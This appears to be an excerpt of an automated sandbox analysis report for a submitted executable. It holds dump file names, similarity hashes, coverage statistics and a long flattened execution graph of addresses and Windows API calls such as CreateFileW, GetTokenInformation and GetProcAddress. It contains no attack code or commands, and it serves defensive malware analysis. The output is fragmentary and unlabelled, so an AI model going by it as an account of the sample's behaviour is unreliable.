• Associated: 00000000.00000002.2153089355.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2153143837.0000000000402000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2153820071.0000000000DB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2153820071.0000000000DB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_aoKTzGQSRP.jbxd
Similarity
• API ID: memset$_sleepfopenstrcmpstrcpy
• String ID:
• API String ID: 1474249034-0
• Opcode ID: 32f5e441197e13009756a199af0f2d775da6853747cb5064d38aa7e0490cc41e
• Instruction ID: 8dbf01f16cda25422d34b83b024fc2d07b066282400bdd01328831ed15b33d86
• Opcode Fuzzy Hash: 32f5e441197e13009756a199af0f2d775da6853747cb5064d38aa7e0490cc41e
• Instruction Fuzzy Hash: C3F098B5A00349EFDB40DFA8D885E8EB7F8BB49308F104465F958D7350D634EA54CBA4

Execution Graph

Execution Coverage: 10.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 12%
Total number of Nodes: 2000
Total number of Limit Nodes: 79
EnterCriticalSection 18540->18553 18555 7ff6fabf7e0c 18554->18555 18556 7ff6fabf7df9 18554->18556 18564 7ff6fabf7a70 18555->18564 18557 7ff6fabfb108 _get_daylight 11 API calls 18556->18557 18559 7ff6fabf7dfe 18557->18559 18561 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 18559->18561 18562 7ff6fabf7e0a 18561->18562 18562->17973 18571 7ff6fac001d8 EnterCriticalSection 18564->18571 18573 7ff6fabe6de3 __vcrt_freefls 18572->18573 18574 7ff6fabe6d61 GetTokenInformation 18572->18574 18576 7ff6fabe6dfc 18573->18576 18577 7ff6fabe6df6 CloseHandle 18573->18577 18575 7ff6fabe6d82 GetLastError 18574->18575 18578 7ff6fabe6d8d 18574->18578 18575->18573 18575->18578 18576->17982 18577->18576 18578->18573 18579 7ff6fabe6da9 GetTokenInformation 18578->18579 18579->18573 18580 7ff6fabe6dcc 18579->18580 18580->18573 18581 7ff6fabe6dd6 ConvertSidToStringSidW 18580->18581 18581->18573 18583 7ff6fabe6e35 18582->18583 18586 7ff6fabf49b8 18583->18586 18587 7ff6fabf4a12 18586->18587 18588 7ff6fabf4a37 18587->18588 18590 7ff6fabf4a73 18587->18590 18589 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18588->18589 18592 7ff6fabf4a61 18589->18592 18604 7ff6fabf1ca8 18590->18604 18593 7ff6fabea9b0 _log10_special 8 API calls 18592->18593 18595 7ff6fabe6e58 18593->18595 18594 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18594->18592 18595->17989 18597 7ff6fabf4b7a 18600 7ff6fabf4b54 18597->18600 18601 7ff6fabf4b84 18597->18601 18598 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18598->18592 18599 7ff6fabf4b20 18599->18600 18603 7ff6fabf4b29 18599->18603 18600->18594 18602 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18601->18602 18602->18592 18603->18598 18605 7ff6fabf1ce6 18604->18605 18606 7ff6fabf1cd6 18604->18606 18607 7ff6fabf1cef 18605->18607 18611 7ff6fabf1d1d 18605->18611 18609 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18606->18609 18610 7ff6fabfa3d8 _invalid_parameter_noinfo 37 
API calls 18607->18610 18608 7ff6fabf1d15 18608->18597 18608->18599 18608->18600 18608->18603 18609->18608 18610->18608 18611->18606 18611->18608 18615 7ff6fabf32f0 18611->18615 18648 7ff6fabf2440 18611->18648 18685 7ff6fabf1230 18611->18685 18616 7ff6fabf3332 18615->18616 18617 7ff6fabf33a3 18615->18617 18620 7ff6fabf33cd 18616->18620 18621 7ff6fabf3338 18616->18621 18618 7ff6fabf33fc 18617->18618 18619 7ff6fabf33a8 18617->18619 18627 7ff6fabf3413 18618->18627 18628 7ff6fabf3406 18618->18628 18633 7ff6fabf340b 18618->18633 18622 7ff6fabf33dd 18619->18622 18623 7ff6fabf33aa 18619->18623 18704 7ff6fabf01cc 18620->18704 18624 7ff6fabf336c 18621->18624 18625 7ff6fabf333d 18621->18625 18711 7ff6fabefdbc 18622->18711 18626 7ff6fabf334c 18623->18626 18635 7ff6fabf33b9 18623->18635 18630 7ff6fabf3343 18624->18630 18624->18633 18625->18627 18625->18630 18646 7ff6fabf343c 18626->18646 18688 7ff6fabf3aa4 18626->18688 18718 7ff6fabf3ff8 18627->18718 18628->18620 18628->18633 18630->18626 18636 7ff6fabf337e 18630->18636 18643 7ff6fabf3367 18630->18643 18633->18646 18722 7ff6fabf05dc 18633->18722 18635->18620 18636->18646 18643->18646 18649 7ff6fabf2464 18648->18649 18650 7ff6fabf244e 18648->18650 18651 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18649->18651 18654 7ff6fabf24a4 18649->18654 18652 7ff6fabf3332 18650->18652 18653 7ff6fabf33a3 18650->18653 18650->18654 18651->18654 18657 7ff6fabf33cd 18652->18657 18658 7ff6fabf3338 18652->18658 18655 7ff6fabf33fc 18653->18655 18656 7ff6fabf33a8 18653->18656 18654->18611 18664 7ff6fabf3413 18655->18664 18665 7ff6fabf3406 18655->18665 18670 7ff6fabf340b 18655->18670 18659 7ff6fabf33dd 18656->18659 18660 7ff6fabf33aa 18656->18660 18666 7ff6fabf01cc 38 API calls 18657->18666 18661 7ff6fabf336c 18658->18661 18662 7ff6fabf333d 18658->18662 18661->18670 18662->18664 18665->18657 18665->18670 18760 7ff6fabef440 18685->18760 18705 7ff6fabf01ff 18704->18705 18761 7ff6fabef475 18760->18761 18762 7ff6fabef487 18760->18762 18763 
7ff6fabfb108 _get_daylight 11 API calls 18761->18763 18765 7ff6fabef495 18762->18765 18769 7ff6fabef4d1 18762->18769 18764 7ff6fabef47a 18763->18764 18767 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18765->18767 18768 7ff6fabef84d 18769->18768 18770 7ff6fabfb108 _get_daylight 11 API calls 18769->18770 18778 7ff6fabe7635 18777->18778 18779 7ff6fabf49b8 48 API calls 18778->18779 18780 7ff6fabe7654 18779->18780 18780->18008 18785 7ff6fabe69ac 18784->18785 18786 7ff6fabe7800 2 API calls 18785->18786 18947 7ff6fabe31a0 108 API calls 18946->18947 18948 7ff6fabe1443 18947->18948 18949 7ff6fabe144b 18948->18949 18950 7ff6fabe146c 18948->18950 18951 7ff6fabe1df0 81 API calls 18949->18951 18952 7ff6fabeeacc 73 API calls 18950->18952 18953 7ff6fabe145b 18951->18953 18954 7ff6fabe1481 18952->18954 18953->18041 18955 7ff6fabe1485 18954->18955 18956 7ff6fabe14a1 18954->18956 18957 7ff6fabe1db0 80 API calls 18955->18957 18958 7ff6fabe14d1 18956->18958 18959 7ff6fabe14b1 18956->18959 18967 7ff6fabe149c __vcrt_freefls 18957->18967 18962 7ff6fabe14d7 18958->18962 18966 7ff6fabe14ea 18958->18966 18960 7ff6fabe1db0 80 API calls 18959->18960 18960->18967 18961 7ff6fabee444 74 API calls 18963 7ff6fabe1564 18961->18963 18970 7ff6fabe11d0 18962->18970 18963->18041 18965 7ff6fabee794 _fread_nolock 53 API calls 18965->18966 18966->18965 18966->18967 18968 7ff6fabe1576 18966->18968 18967->18961 18969 7ff6fabe1db0 80 API calls 18968->18969 18969->18967 18971 7ff6fabe1228 18970->18971 18972 7ff6fabe122f 18971->18972 18973 7ff6fabe1257 18971->18973 18974 7ff6fabe1df0 81 API calls 18972->18974 18976 7ff6fabe1271 18973->18976 18977 7ff6fabe128d 18973->18977 18975 7ff6fabe1242 18974->18975 18975->18967 18978 7ff6fabe1db0 80 API calls 18976->18978 18979 7ff6fabe129f 18977->18979 18980 7ff6fabe12bb memcpy_s 18977->18980 18983 7ff6fabe1288 __vcrt_freefls 18978->18983 18981 7ff6fabe1db0 80 API calls 18979->18981 18982 7ff6fabee794 _fread_nolock 53 API calls 18980->18982 18980->18983 18984 
7ff6fabe137f 18980->18984 18987 7ff6fabee508 37 API calls 18980->18987 18988 7ff6fabeeed4 18980->18988 18981->18983 18982->18980 18983->18967 18985 7ff6fabe1df0 81 API calls 18984->18985 18985->18983 18987->18980 18989 7ff6fabeef04 18988->18989 18992 7ff6fabeec24 18989->18992 19008 7ff6fabe314a 19007->19008 19009 7ff6fabe7800 2 API calls 19008->19009 19010 7ff6fabe316f 19009->19010 19011 7ff6fabea9b0 _log10_special 8 API calls 19010->19011 19012 7ff6fabe3197 19011->19012 19012->18051 19014 7ff6fabe670e 19013->19014 19015 7ff6fabe6832 19014->19015 19016 7ff6fabe1bd0 49 API calls 19014->19016 19017 7ff6fabea9b0 _log10_special 8 API calls 19015->19017 19021 7ff6fabe6795 19016->19021 19018 7ff6fabe6863 19017->19018 19018->18051 19019 7ff6fabe1bd0 49 API calls 19019->19021 19020 7ff6fabe3140 10 API calls 19020->19021 19021->19015 19021->19019 19021->19020 19022 7ff6fabe7800 2 API calls 19021->19022 19023 7ff6fabe6803 CreateDirectoryW 19022->19023 19023->19015 19023->19021 19025 7ff6fabe15b3 19024->19025 19026 7ff6fabe15d7 19024->19026 19113 7ff6fabe1030 19025->19113 19028 7ff6fabe31a0 108 API calls 19026->19028 19029 7ff6fabe15eb 19028->19029 19031 7ff6fabe15f3 19029->19031 19032 7ff6fabe161b 19029->19032 19030 7ff6fabe15b8 19033 7ff6fabe15ce 19030->19033 19036 7ff6fabe1df0 81 API calls 19030->19036 19034 7ff6fabe1db0 80 API calls 19031->19034 19035 7ff6fabe31a0 108 API calls 19032->19035 19033->18051 19037 7ff6fabe160a 19034->19037 19038 7ff6fabe162f 19035->19038 19036->19033 19037->18051 19039 7ff6fabe1651 19038->19039 19040 7ff6fabe1637 19038->19040 19042 7ff6fabeeacc 73 API calls 19039->19042 19041 7ff6fabe1df0 81 API calls 19040->19041 19043 7ff6fabe1647 19041->19043 19044 7ff6fabe1666 19042->19044 19047 7ff6fabee444 74 API calls 19043->19047 19045 7ff6fabe168b 19044->19045 19046 7ff6fabe166a 19044->19046 19048 7ff6fabe1691 19045->19048 19049 7ff6fabe16a9 19045->19049 19050 7ff6fabe1db0 80 API calls 19046->19050 19051 7ff6fabe17ad 19047->19051 19051->18051 19064 
7ff6fabe5b6b 19062->19064 19065 7ff6fabe5b24 19062->19065 19064->18051 19065->19064 19152 7ff6fabf4d10 19065->19152 19067 7ff6fabe2d81 19066->19067 19068 7ff6fabe30c0 49 API calls 19067->19068 19069 7ff6fabe2dbb 19068->19069 19070 7ff6fabe30c0 49 API calls 19069->19070 19071 7ff6fabe2dcb 19070->19071 19072 7ff6fabe2ded 19071->19072 19073 7ff6fabe2e1c 19071->19073 19167 7ff6fabe2cf0 19072->19167 19075 7ff6fabe2cf0 51 API calls 19073->19075 19076 7ff6fabe2e1a 19075->19076 19077 7ff6fabe2e7c 19076->19077 19078 7ff6fabe2e47 19076->19078 19080 7ff6fabe2cf0 51 API calls 19077->19080 19174 7ff6fabe65d0 19078->19174 19082 7ff6fabe2ea0 19080->19082 19091 7ff6fabe2ef2 19082->19091 19111 7ff6fabe1bd0 49 API calls 19110->19111 19112 7ff6fabe3054 19111->19112 19112->18051 19114 7ff6fabe31a0 108 API calls 19113->19114 19115 7ff6fabe106b 19114->19115 19116 7ff6fabe1073 19115->19116 19117 7ff6fabe1088 19115->19117 19118 7ff6fabe1df0 81 API calls 19116->19118 19119 7ff6fabeeacc 73 API calls 19117->19119 19124 7ff6fabe1083 __vcrt_freefls 19118->19124 19120 7ff6fabe109d 19119->19120 19121 7ff6fabe10a1 19120->19121 19122 7ff6fabe10bd 19120->19122 19123 7ff6fabe1db0 80 API calls 19121->19123 19125 7ff6fabe10ed 19122->19125 19126 7ff6fabe10cd 19122->19126 19132 7ff6fabe10b8 __vcrt_freefls 19123->19132 19124->19030 19129 7ff6fabe10f3 19125->19129 19135 7ff6fabe1106 19125->19135 19127 7ff6fabe1db0 80 API calls 19126->19127 19127->19132 19128 7ff6fabee444 74 API calls 19131 7ff6fabe11d0 89 API calls 19129->19131 19131->19132 19132->19128 19134 7ff6fabee794 _fread_nolock 53 API calls 19134->19135 19135->19132 19135->19134 19136 7ff6fabe11ac 19135->19136 19137 7ff6fabe1db0 80 API calls 19136->19137 19137->19132 19153 7ff6fabf4d1d 19152->19153 19154 7ff6fabf4d4a 19152->19154 19156 7ff6fabfb108 _get_daylight 11 API calls 19153->19156 19160 7ff6fabf4cd4 19153->19160 19155 7ff6fabf4d6d 19154->19155 19158 7ff6fabf4d89 19154->19158 19157 7ff6fabfb108 _get_daylight 11 API calls 19155->19157 19159 
7ff6fabf4d27 19156->19159 19161 7ff6fabf4d72 19157->19161 19162 7ff6fabf4c38 45 API calls 19158->19162 19163 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 19159->19163 19160->19065 19164 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 19161->19164 19166 7ff6fabf4d7d 19162->19166 19165 7ff6fabf4d32 19163->19165 19164->19166 19165->19065 19166->19065 19168 7ff6fabe2d16 19167->19168 19169 7ff6fabf4764 49 API calls 19168->19169 19171 7ff6fabe2d3c 19169->19171 19170 7ff6fabe2d4d 19170->19076 19171->19170 19172 7ff6fabe3140 10 API calls 19171->19172 19175 7ff6fabe65e5 19174->19175 19231 7ff6fabf5ce8 19230->19231 19232 7ff6fabf5d0e 19231->19232 19234 7ff6fabf5d41 19231->19234 19233 7ff6fabfb108 _get_daylight 11 API calls 19232->19233 19235 7ff6fabf5d13 19233->19235 19236 7ff6fabf5d54 19234->19236 19237 7ff6fabf5d47 19234->19237 19238 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 19235->19238 19249 7ff6fabfa7b0 19236->19249 19239 7ff6fabfb108 _get_daylight 11 API calls 19237->19239 19241 7ff6fabe31f6 19238->19241 19239->19241 19241->18078 19262 7ff6fac001d8 EnterCriticalSection 19249->19262 19622 7ff6fabf7694 19621->19622 19625 7ff6fabf7170 19622->19625 19624 7ff6fabf76ad 19624->18088 19626 7ff6fabf71ba 19625->19626 19627 7ff6fabf718b 19625->19627 19635 7ff6fabf4f7c EnterCriticalSection 19626->19635 19628 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 19627->19628 19631 7ff6fabf71ab 19628->19631 19631->19624 19637 7ff6fabee23b 19636->19637 19638 7ff6fabee269 19636->19638 19639 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 19637->19639 19641 7ff6fabee25b 19638->19641 19646 7ff6fabf4f7c EnterCriticalSection 19638->19646 19639->19641 19641->18092 19648 7ff6fabe7800 2 API calls 19647->19648 19649 7ff6fabe73e4 LoadLibraryExW 19648->19649 19650 7ff6fabe7403 __vcrt_freefls 19649->19650 19650->18138 19652 7ff6fabe6113 GetProcAddress 19651->19652 19653 7ff6fabe60e9 19651->19653 19652->19653 19654 7ff6fabe6138 GetProcAddress 19652->19654 19656 7ff6fabe1ed0 
80 API calls 19653->19656 19654->19653 19655 7ff6fabe615d GetProcAddress 19654->19655 19655->19653 19657 7ff6fabe6185 GetProcAddress 19655->19657 19658 7ff6fabe6103 19656->19658 19657->19653 19659 7ff6fabe61ad GetProcAddress 19657->19659 19658->18145 19659->19653 19710->18153 19711->18155 19713 7ff6fabe4d65 19712->19713 19714 7ff6fabe1bd0 49 API calls 19713->19714 19715 7ff6fabe4da1 19714->19715 19716 7ff6fabe4daa 19715->19716 19717 7ff6fabe4dcd 19715->19717 19719 7ff6fabe1df0 81 API calls 19716->19719 19718 7ff6fabe3210 49 API calls 19717->19718 19720 7ff6fabe4de5 19718->19720 19736 7ff6fabe4dc3 19719->19736 19721 7ff6fabe4e03 19720->19721 19722 7ff6fabe1df0 81 API calls 19720->19722 19723 7ff6fabe3140 10 API calls 19721->19723 19722->19721 19725 7ff6fabe4e0d 19723->19725 19724 7ff6fabea9b0 _log10_special 8 API calls 19726 7ff6fabe224e 19724->19726 19727 7ff6fabe4e1b 19725->19727 19728 7ff6fabe73d0 3 API calls 19725->19728 19726->18166 19743 7ff6fabe4ee0 19726->19743 19729 7ff6fabe3210 49 API calls 19727->19729 19728->19727 19730 7ff6fabe4e34 19729->19730 19731 7ff6fabe4e59 19730->19731 19732 7ff6fabe4e39 19730->19732 19733 7ff6fabe73d0 3 API calls 19731->19733 19734 7ff6fabe1df0 81 API calls 19732->19734 19735 7ff6fabe4e66 19733->19735 19734->19736 19737 7ff6fabe4e72 19735->19737 19738 7ff6fabe4ea9 19735->19738 19736->19724 19739 7ff6fabe7800 2 API calls 19737->19739 19797 7ff6fabe42e0 GetProcAddress 19738->19797 19882 7ff6fabe3eb0 19743->19882 19745 7ff6fabe4f1a 19746 7ff6fabe4f33 19745->19746 19747 7ff6fabe4f22 19745->19747 19889 7ff6fabe3680 19746->19889 19748 7ff6fabe1df0 81 API calls 19747->19748 19754 7ff6fabe4f2e 19748->19754 19754->18162 19883 7ff6fabe3edc 19882->19883 19884 7ff6fabe3ee4 19883->19884 19887 7ff6fabe4084 19883->19887 19920 7ff6fabf68c4 19883->19920 19884->19745 19885 7ff6fabe4247 __vcrt_freefls 19885->19745 19886 7ff6fabe33b0 47 API calls 19886->19887 19887->19885 19887->19886 19890 7ff6fabe36b0 19889->19890 19891 7ff6fabea9b0 
_log10_special 8 API calls 19890->19891 19921 7ff6fabf68f4 19920->19921 19924 7ff6fabf5dc0 19921->19924 19925 7ff6fabf5e03 19924->19925 19926 7ff6fabf5df1 19924->19926 19928 7ff6fabf5e4d 19925->19928 19930 7ff6fabf5e10 19925->19930 19927 7ff6fabfb108 _get_daylight 11 API calls 19926->19927 19929 7ff6fabf5df6 19927->19929 19931 7ff6fabf5e68 19928->19931 19932 7ff6fabf4110 45 API calls 19928->19932 19935 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 19930->19935 19932->19931 19985->18170 19987 7ff6fabfacd0 __CxxCallCatchBlock 45 API calls 19986->19987 19988 7ff6fabf9fe1 19987->19988 19989 7ff6fabfa08c __CxxCallCatchBlock 45 API calls 19988->19989 19990 7ff6fabfa001 19989->19990 20046 7ff6fabf9519 20047 7ff6fabf9fd8 45 API calls 20046->20047 20048 7ff6fabf951e 20047->20048 20049 7ff6fabf9545 GetModuleHandleW 20048->20049 20050 7ff6fabf958f 20048->20050 20049->20050 20056 7ff6fabf9552 20049->20056 20058 7ff6fabf941c 20050->20058 20056->20050 20072 7ff6fabf9640 GetModuleHandleExW 20056->20072 20078 7ff6fac001d8 EnterCriticalSection 20058->20078 20073 7ff6fabf9674 GetProcAddress 20072->20073 20074 7ff6fabf969d 20072->20074 20077 7ff6fabf9686 20073->20077 20075 7ff6fabf96a2 FreeLibrary 20074->20075 20076 7ff6fabf96a9 20074->20076 20075->20076 20076->20050 20077->20074 20701 7ff6fabeafb0 20702 7ff6fabeafc0 20701->20702 20718 7ff6fabf9760 20702->20718 20704 7ff6fabeafcc 20724 7ff6fabeb2b8 20704->20724 20706 7ff6fabeb59c 7 API calls 20708 7ff6fabeb065 20706->20708 20707 7ff6fabeafe4 _RTC_Initialize 20716 7ff6fabeb039 20707->20716 20729 7ff6fabeb468 20707->20729 20710 7ff6fabeaff9 20732 7ff6fabf8bd0 20710->20732 20716->20706 20717 7ff6fabeb055 20716->20717 20719 7ff6fabf9771 20718->20719 20720 7ff6fabf9779 20719->20720 20721 7ff6fabfb108 _get_daylight 11 API calls 20719->20721 20720->20704 20722 7ff6fabf9788 20721->20722 20723 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 20722->20723 20723->20720 20725 7ff6fabeb2c9 20724->20725 20728 7ff6fabeb2ce 
__scrt_release_startup_lock 20724->20728 20726 7ff6fabeb59c 7 API calls 20725->20726 20725->20728 20727 7ff6fabeb342 20726->20727 20728->20707 20757 7ff6fabeb42c 20729->20757 20731 7ff6fabeb471 20731->20710 20733 7ff6fabf8bf0 20732->20733 20747 7ff6fabeb005 20732->20747 20734 7ff6fabf8c0e GetModuleFileNameW 20733->20734 20735 7ff6fabf8bf8 20733->20735 20739 7ff6fabf8c39 20734->20739 20736 7ff6fabfb108 _get_daylight 11 API calls 20735->20736 20737 7ff6fabf8bfd 20736->20737 20738 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 20737->20738 20738->20747 20772 7ff6fabf8b70 20739->20772 20742 7ff6fabf8c81 20743 7ff6fabfb108 _get_daylight 11 API calls 20742->20743 20744 7ff6fabf8c86 20743->20744 20745 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20744->20745 20745->20747 20746 7ff6fabf8c99 20749 7ff6fabf8ce7 20746->20749 20750 7ff6fabf8d00 20746->20750 20754 7ff6fabf8cbb 20746->20754 20747->20716 20756 7ff6fabeb53c InitializeSListHead 20747->20756 20748 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20748->20747 20751 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20749->20751 20750->20750 20752 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20750->20752 20753 7ff6fabf8cf0 20751->20753 20752->20754 20755 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20753->20755 20754->20748 20755->20747 20758 7ff6fabeb446 20757->20758 20760 7ff6fabeb43f 20757->20760 20761 7ff6fabf9dec 20758->20761 20760->20731 20764 7ff6fabf9a28 20761->20764 20771 7ff6fac001d8 EnterCriticalSection 20764->20771 20773 7ff6fabf8b88 20772->20773 20777 7ff6fabf8bc0 20772->20777 20774 7ff6fabfeb84 _get_daylight 11 API calls 20773->20774 20773->20777 20775 7ff6fabf8bb6 20774->20775 20776 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20775->20776 20776->20777 20777->20742 20777->20746 20778 7ff6fac014b0 20789 7ff6fac07444 20778->20789 
20790 7ff6fac07451 20789->20790 20791 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20790->20791 20792 7ff6fac0746d 20790->20792 20791->20790 20793 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20792->20793 20794 7ff6fac014b9 20792->20794 20793->20792 20795 7ff6fac001d8 EnterCriticalSection 20794->20795 16543 7ff6fabf5444 16544 7ff6fabf545e 16543->16544 16545 7ff6fabf547b 16543->16545 16594 7ff6fabfb0e8 16544->16594 16545->16544 16546 7ff6fabf548e CreateFileW 16545->16546 16548 7ff6fabf54c2 16546->16548 16549 7ff6fabf54f8 16546->16549 16568 7ff6fabf5598 GetFileType 16548->16568 16603 7ff6fabf5a20 16549->16603 16558 7ff6fabf54ed CloseHandle 16563 7ff6fabf5476 16558->16563 16559 7ff6fabf54d7 CloseHandle 16559->16563 16560 7ff6fabf5501 16624 7ff6fabfb07c 16560->16624 16561 7ff6fabf552c 16629 7ff6fabf57e0 16561->16629 16567 7ff6fabf550b 16567->16563 16569 7ff6fabf56a3 16568->16569 16570 7ff6fabf55e6 16568->16570 16572 7ff6fabf56cd 16569->16572 16573 7ff6fabf56ab 16569->16573 16571 7ff6fabf5612 GetFileInformationByHandle 16570->16571 16575 7ff6fabf591c 21 API calls 16570->16575 16576 7ff6fabf56be GetLastError 16571->16576 16577 7ff6fabf563b 16571->16577 16574 7ff6fabf56f0 PeekNamedPipe 16572->16574 16593 7ff6fabf568e 16572->16593 16573->16576 16578 7ff6fabf56af 16573->16578 16574->16593 16579 7ff6fabf5600 16575->16579 16582 7ff6fabfb07c _fread_nolock 11 API calls 16576->16582 16580 7ff6fabf57e0 51 API calls 16577->16580 16581 7ff6fabfb108 _get_daylight 11 API calls 16578->16581 16579->16571 16579->16593 16584 7ff6fabf5646 16580->16584 16581->16593 16582->16593 16646 7ff6fabf5740 16584->16646 16588 7ff6fabf5740 10 API calls 16589 7ff6fabf5665 16588->16589 16590 7ff6fabf5740 10 API calls 16589->16590 16591 7ff6fabf5676 16590->16591 16592 7ff6fabfb108 _get_daylight 11 API calls 16591->16592 16591->16593 16592->16593 16653 7ff6fabea9b0 16593->16653 16667 7ff6fabfae48 GetLastError 16594->16667 16596 7ff6fabf5463 16597 
7ff6fabfb108 16596->16597 16598 7ff6fabfae48 _get_daylight 11 API calls 16597->16598 16599 7ff6fabf546b 16598->16599 16600 7ff6fabfa4a4 16599->16600 16725 7ff6fabfa33c 16600->16725 16602 7ff6fabfa4bd 16602->16563 16604 7ff6fabf5a56 16603->16604 16605 7ff6fabfb108 _get_daylight 11 API calls 16604->16605 16623 7ff6fabf5aee __vcrt_freefls 16604->16623 16607 7ff6fabf5a68 16605->16607 16606 7ff6fabea9b0 _log10_special 8 API calls 16608 7ff6fabf54fd 16606->16608 16609 7ff6fabfb108 _get_daylight 11 API calls 16607->16609 16608->16560 16608->16561 16610 7ff6fabf5a70 16609->16610 16777 7ff6fabf79bc 16610->16777 16612 7ff6fabf5a85 16613 7ff6fabf5a8d 16612->16613 16614 7ff6fabf5a97 16612->16614 16615 7ff6fabfb108 _get_daylight 11 API calls 16613->16615 16616 7ff6fabfb108 _get_daylight 11 API calls 16614->16616 16620 7ff6fabf5a92 16615->16620 16617 7ff6fabf5a9c 16616->16617 16618 7ff6fabfb108 _get_daylight 11 API calls 16617->16618 16617->16623 16619 7ff6fabf5aa6 16618->16619 16621 7ff6fabf79bc 45 API calls 16619->16621 16622 7ff6fabf5ae0 GetDriveTypeW 16620->16622 16620->16623 16621->16620 16622->16623 16623->16606 16625 7ff6fabfae48 _get_daylight 11 API calls 16624->16625 16626 7ff6fabfb089 Concurrency::details::SchedulerProxy::DeleteThis 16625->16626 16627 7ff6fabfae48 _get_daylight 11 API calls 16626->16627 16628 7ff6fabfb0ab 16627->16628 16628->16567 16631 7ff6fabf5808 16629->16631 16630 7ff6fabf5539 16639 7ff6fabf591c 16630->16639 16631->16630 16871 7ff6fabff624 16631->16871 16633 7ff6fabf589c 16633->16630 16634 7ff6fabff624 51 API calls 16633->16634 16635 7ff6fabf58af 16634->16635 16635->16630 16636 7ff6fabff624 51 API calls 16635->16636 16637 7ff6fabf58c2 16636->16637 16637->16630 16638 7ff6fabff624 51 API calls 16637->16638 16638->16630 16640 7ff6fabf5936 16639->16640 16641 7ff6fabf596d 16640->16641 16642 7ff6fabf5946 16640->16642 16643 7ff6fabff4b8 21 API calls 16641->16643 16644 7ff6fabfb07c _fread_nolock 11 API calls 16642->16644 16645 7ff6fabf5956 16642->16645 
16643->16645 16644->16645 16645->16567 16647 7ff6fabf575c 16646->16647 16648 7ff6fabf5769 FileTimeToSystemTime 16646->16648 16647->16648 16650 7ff6fabf5764 16647->16650 16649 7ff6fabf577d SystemTimeToTzSpecificLocalTime 16648->16649 16648->16650 16649->16650 16651 7ff6fabea9b0 _log10_special 8 API calls 16650->16651 16652 7ff6fabf5655 16651->16652 16652->16588 16654 7ff6fabea9b9 16653->16654 16655 7ff6fabead40 IsProcessorFeaturePresent 16654->16655 16656 7ff6fabea9c4 16654->16656 16657 7ff6fabead58 16655->16657 16656->16558 16656->16559 16662 7ff6fabeaf38 RtlCaptureContext 16657->16662 16663 7ff6fabeaf52 RtlLookupFunctionEntry 16662->16663 16664 7ff6fabead6b 16663->16664 16665 7ff6fabeaf68 RtlVirtualUnwind 16663->16665 16666 7ff6fabead00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16664->16666 16665->16663 16665->16664 16668 7ff6fabfae6c 16667->16668 16669 7ff6fabfae89 FlsSetValue 16667->16669 16668->16669 16681 7ff6fabfae79 SetLastError 16668->16681 16670 7ff6fabfae9b 16669->16670 16669->16681 16684 7ff6fabfeb84 16670->16684 16674 7ff6fabfaec8 FlsSetValue 16677 7ff6fabfaed4 FlsSetValue 16674->16677 16678 7ff6fabfaee6 16674->16678 16675 7ff6fabfaeb8 FlsSetValue 16676 7ff6fabfaec1 16675->16676 16691 7ff6fabfa0e4 16676->16691 16677->16676 16697 7ff6fabfaa7c 16678->16697 16681->16596 16690 7ff6fabfeb95 _get_daylight 16684->16690 16685 7ff6fabfebe6 16687 7ff6fabfb108 _get_daylight 10 API calls 16685->16687 16686 7ff6fabfebca HeapAlloc 16688 7ff6fabfaeaa 16686->16688 16686->16690 16687->16688 16688->16674 16688->16675 16690->16685 16690->16686 16702 7ff6fac03390 16690->16702 16692 7ff6fabfa0e9 RtlFreeHeap 16691->16692 16696 7ff6fabfa118 16691->16696 16693 7ff6fabfa104 GetLastError 16692->16693 16692->16696 16694 7ff6fabfa111 Concurrency::details::SchedulerProxy::DeleteThis 16693->16694 16695 7ff6fabfb108 _get_daylight 9 API calls 16694->16695 16695->16696 16696->16681 16711 7ff6fabfa954 16697->16711 16705 7ff6fac033d0 
